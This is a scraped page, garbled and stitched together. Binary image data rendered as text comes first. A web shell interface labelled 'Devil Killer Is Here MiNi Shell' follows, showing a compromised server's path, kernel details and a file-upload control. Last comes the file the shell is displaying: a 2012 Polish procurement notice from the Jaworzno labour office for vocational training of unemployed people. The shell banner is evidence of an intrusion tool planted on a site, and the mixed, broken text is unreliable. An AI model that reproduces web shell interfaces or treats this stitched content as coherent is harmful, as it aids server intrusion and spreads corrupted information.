JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/318098-N-2012.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych ze środków Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 318098 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupjaworzno.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych ze środków Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych ze środków Funduszu Pracy w następujących zakresach:
Zakres I:   Spawacz spoin pachwinowych blach i rur w metodzie MAG i TIG - 8 osób w I edycji,
Zakres II:    Technolog robót wykończeniowych - 10 osób w I edycji, 
Zakres III: Monter instalacji wodociągowej i kanalizacyjnej, centralnego ogrzewania i gazowej -   5 osób w I edycji,
Zakres  IV:  Księgowość - 5 osób  w I edycji,
Zakres  V: Sekretarka - 5 osób  w I edycji.
Zakres  VI:  Operator - kierowca wózka jezdniowego wraz wymianą butli gazowych oraz egzaminem UDT -10 osób  w I edycji.
Zakres  VII: Uprawnienia SEP do 1 kV - 5 osób  w I edycji.
Zakres  VIII: Podstawy przedsiębiorczości - 15 osób  w I edycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /Dz. U. Nr 236 poz. 2365/.
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 pkt 3.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku  wymagane jest by Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej trzy usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia.  
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1) wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane                    z kierunkiem szkolenia lub wykształcenie wyższe oraz minimum 5 letnie doświadczenie zawodowe                z zakresu objętego szkoleniem;
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej wykształcenie średnie związane z kierunkiem szkolenia lub wykształcenie średnie oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem;
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie zawodowe                w prowadzeniu zajęć zgodnych z kierunkiem szkolenia;
4) każda z osób prowadzących zajęcia musi posiadać uprawnienia pedagogiczne lub co najmniej 
2 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych.
1.3.2	Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów
i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Prawo zamówień publicznych - (załącznik nr 5 do SIWZ.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.7</li>
<li>2 - doświadczenie w prowadzeniu szkoleń - 0.2</li>
<li>3 - posiadanie certyfikatu jakości usług - - 0.1</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośredniolub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przemiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie uzasadnionych przypadkach, np. niezakwalifikowanie sie odpowiedniej liczby uczestników szkolenia - może także nastąpić z inicjatywy Zamawiajacego
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia.
W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie kolejnego naboru, brak osób spełniajacfych warunki skierowania na szkolenie, Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupjaworzno.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 10:30, miejsce: Ofertę należy złożyć w siedzibie Powiatowego Urzędu Pracy w Jaworznie przy ulicy Północnej 9b,  I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I.  Zakres: Spawacz spoin pachwinowych blach i rur w metodzie MAG i TIG -  8 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni.  
Program szkolenia: Program szkolenia powinien obejmować minimum 240 godzin, w tym minimum 30 godzin teorii oraz minimum 210 godzin zajęć praktycznych (z zakresu spawania metodą MAG i TIG). Program szkolenia powinien zostać opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 
3 pkt 3.5 SIWZ, książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa 
w Gliwicach. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 48.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II. Zakres: Technolog robót wykończeniowych - 10 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia:  minimalna ilość godzin- 240, w tym minimum 200 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych.
Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: technolog robót wykończeniowych w budownictwie (kod zawodu: 713901) oraz musi zawierać następujące jednostki modułowe:
1) przepisy bhp i p.poż. obowiązujące na stanowisku pracy, 
2) określanie właściwości materiałów do robót wykończeniowych w celu ich właściwego zastosowania, transportowania i składowania (materiałoznawstwo), 
3) przygotowywanie materiałów do robót wykończeniowych, 
4) organizowanie stanowiska pracy do wykonywania robót wykończeniowych,
5) wykonywanie robót malarskich,
6) wykonywanie wykończeniowych robót murarskich, 
7) wykonywanie robót tynkarskich, 
8) wykonywanie robót okładzinowych, 
9) wykonywanie dociepleń budynków, 
10) wykonywanie robót podłogowych, 
11) nowoczesne technologie wykańczania wnętrz (m.in. wykonywanie gładzi gipsowych, sufitów podwieszanych, nowoczesne style w układaniu paneli i kafelek) 
12) wykonywanie kalkulacji, kosztorysów robót, rozliczeń robocizny, materiałów sprzętu i maszyn, 
13) ocenianie jakości i poprawności wykonanej pracy
14) elementy wykonywania instalacji elektrycznych, 
15) elementy wykonywania instalacji i urządzeń hydraulicznych 
Dodatkowe wymagania: Wykonawca zapewni dla każdego uczestnika szkolenia odzież ochronną oraz materiały budowlane i wykończeniowe, a także sprzęt niezbędne do odbycia wszystkich zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 48.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III. zakres: Monter instalacji wodociągowej i kanalizacyjnej, centralnego ogrzewania i gazowej
- 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni.  
Program szkolenia:  minimalna ilość godzin: 300, w tym minimum 250 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: monter instalacji wodociągowych i kanalizacyjnych, z zakresu: monter instalacji kanalizacyjnej (kod zawodu: 713604) w wymiarze minimum 60 godzin, z następującymi jednostkami modułowymi: 1) Ogólne przepisy BHP i ppoż. 2) Czytanie dokumentacji technicznej3) Sporządzanie zapotrzebowania materiałowego 4) Trasowanie układu instalacji 5) Wykonanie otworów i bruzd w przegrodach budowlanych 6) Montaż zamocowań rur 7) Dobór i cięcie rur 8) Montaż rur kanalizacyjnych i uzbrojenia
9) Montaż przyborów sanitarnych 10) Próba szczelności instalacji kanalizacyjnej
2. modułowy program szkolenia zawodowego dla zawodu: monter instalacji wodociągowych i kanalizacyjnych, z zakresu: roboty instalacyjne wodociągowe i kanalizacyjne (kod zawodu: 713604) w wymiarze minimum 60 godzin, z następującymi jednostkami modułowymi: 1) Przygotowanie robót instalacyjnych, wodociągowych i kanalizacyjnych na podstawie dokumentacji technicznej 2) Przestrzeganie przepisów bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej i ochrony środowiska oraz udzielania pomocy przedlekarskiej
3) Montaż instalacji wodociągowej z rur stalowych ocynkowanych miedzianych i z tworzyw sztucznych 4) Montaż instalacji kanalizacyjnej z rur z tworzyw sztucznych
5) Montaż przyborów sanitarnych 6) Wykonanie prac konserwacyjnych i naprawczych instalacji wodociągowychi kanalizacyjnych 3. modułowy program szkolenia zawodowego dla zawodu: monter instalacji centralnego ogrzewania i ciepłej wody, z zakresu: monter instalacji CO i CWU niskotemperaturowej w technologii rur z tworzyw sztucznych (kod zawodu: 713601) w wymiarze minimum 70 godzin, z następującymi jednostkami modułowymi: 
1) Ogólne przepisy bhp i p.poż. 2) Ogólne przepisy o gospodarce energetycznej i dozorze technicznym 3) Czytanie dokumentacji technicznej 4) Sporządzanie zapotrzebowania materiałowego 5) Trasowanie układu instalacji 6) Wykonanie otworów i bruzd 7) Montaż zamocowań rur 8) Dobór i cięcie rur  9) Gięcie rur
10) Gwintowanie rur 11) Wykonanie łączeń spawanych 12) Wykonanie łączeń gwintowanych rur stalowych 13) Technologia obróbki rur miedzianych
14) Wykonanie łączeń lutowanych rur miedzianych 15) Wykonanie łączeń klejonych rur z tworzyw sztucznych 16) Wykonanie łączeń zgrzewanych rur z tworzyw sztucznych 17) Montaż rur stalowych i armatury 18) Montaż rur z tworzyw sztucznych i armatury 19) Montaż rur miedzianych i armatury 20) Instalowanie kotła c.o. 21) Podłączenie kotła c.o. do instalacji 22) Montaż podgrzewacza c.w.u.
23) Montaż armatury i urządzeń pomocniczych 24) Montaż naczynia wzbiorczego otwartego 25) Montaż naczynia wzbiorczego przeponowego 26) Montaż odbiorników ciepła 27) Montaż palnika olejowego 28) Montaż palnika gazowego
29) Montaż aparatury kontrolno-pomiarowej i regulacyjnej kotła c.o. i instalacji c.o. i c.w.u. 30) Montaż aparatury sterującej kotła c.o., instalacji c.o. i c.w.u.
31) Próba szczelności instalacji na zimno 32) Płukanie instalacji
4. modułowy program szkolenia zawodowego dla zawodu: monter instalacji centralnego ogrzewania i ciepłej wody, z zakresu: monter aparatury sterującej i kontrolno pomiarowej kotła CO (kod zawodu: 713601) 
w wymiarze minimum 60 godzin, z następującymi jednostkami modułowymi: 
1) Ogólne przepisy bhp i przeciwpożarowe
2) Ogólne przepisy o gospodarce energetycznej i dozorze technicznym
3) Czytanie dokumentacji technicznej
4) Montaż aparatury kontrolno-pomiarowej i regulacyjnej kotła c.o. i instalacji c.o i c.w.u
5) Montaż aparatury sterującej kotła c.o., instalacji c.o. i c.w.u.
6) Obsługa aparatury kontrolno-pomiarowej i regulacyjnej kotła c.o i instalacji c.o. i c.w.u.
7) Obsługa aparatury sterującej kotła c.o., instalacji c.o. i c.w.u.
8) Próbne uruchomienie instalacji na gorąco i regulacja działania
9) Próbne uruchomienie instalacji na gorąco i regulacja działania
5. modułowy program szkolenia zawodowego dla zawodu: monter sieci gazowych, z zakresu: montaż rur gazowych z polietylenu (kod zawodu: 713703) w wymiarze minimum 50 godzin, z następującymi jednostkami modułowymi:
